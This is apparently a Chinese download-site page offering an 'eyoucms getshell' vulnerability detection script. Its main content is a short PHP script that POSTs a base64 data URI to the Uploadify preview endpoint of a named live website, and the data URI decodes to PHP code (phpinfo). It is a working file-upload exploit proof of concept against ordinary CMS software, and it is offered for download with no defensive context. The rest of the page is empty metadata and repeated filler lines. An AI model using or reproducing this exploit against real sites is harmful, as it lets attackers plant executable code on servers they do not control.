eyoucms getshell漏洞检测脚本
评分:0.0分
下载地址
- 软件大小:
- 软件语言:中文
- 更新时间:2018-11-21 00:01:55
- 软件类别:免费/共享
- 软件性质:PC软件
- 软件厂商:
- 运行环境:WinAll
- 软件等级:

- 官方网址:
中文/
中文/
中文/
中文/
中文/
中文/
中文/
中文/
中文/
中文/
本地漏洞演示

漏洞检测脚本
内容:
- <?php
- function request_post($url = '', $param = '')
- {
- if(empty($url) || empty($param))
- {
- return false;
- }
- $postUrl = $url;
- $curlPost = $param;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_URL, $postUrl);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
- $data = curl_exec($ch);
- $return_content = curl_multi_getcontent($ch);
- return $return_content;
- }
- $return_content = request_post("https://www.cesafe.com/index.php/api/Uploadify/preview", "data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==");
- echo $return_content;
- ?>
展开内容
用户评论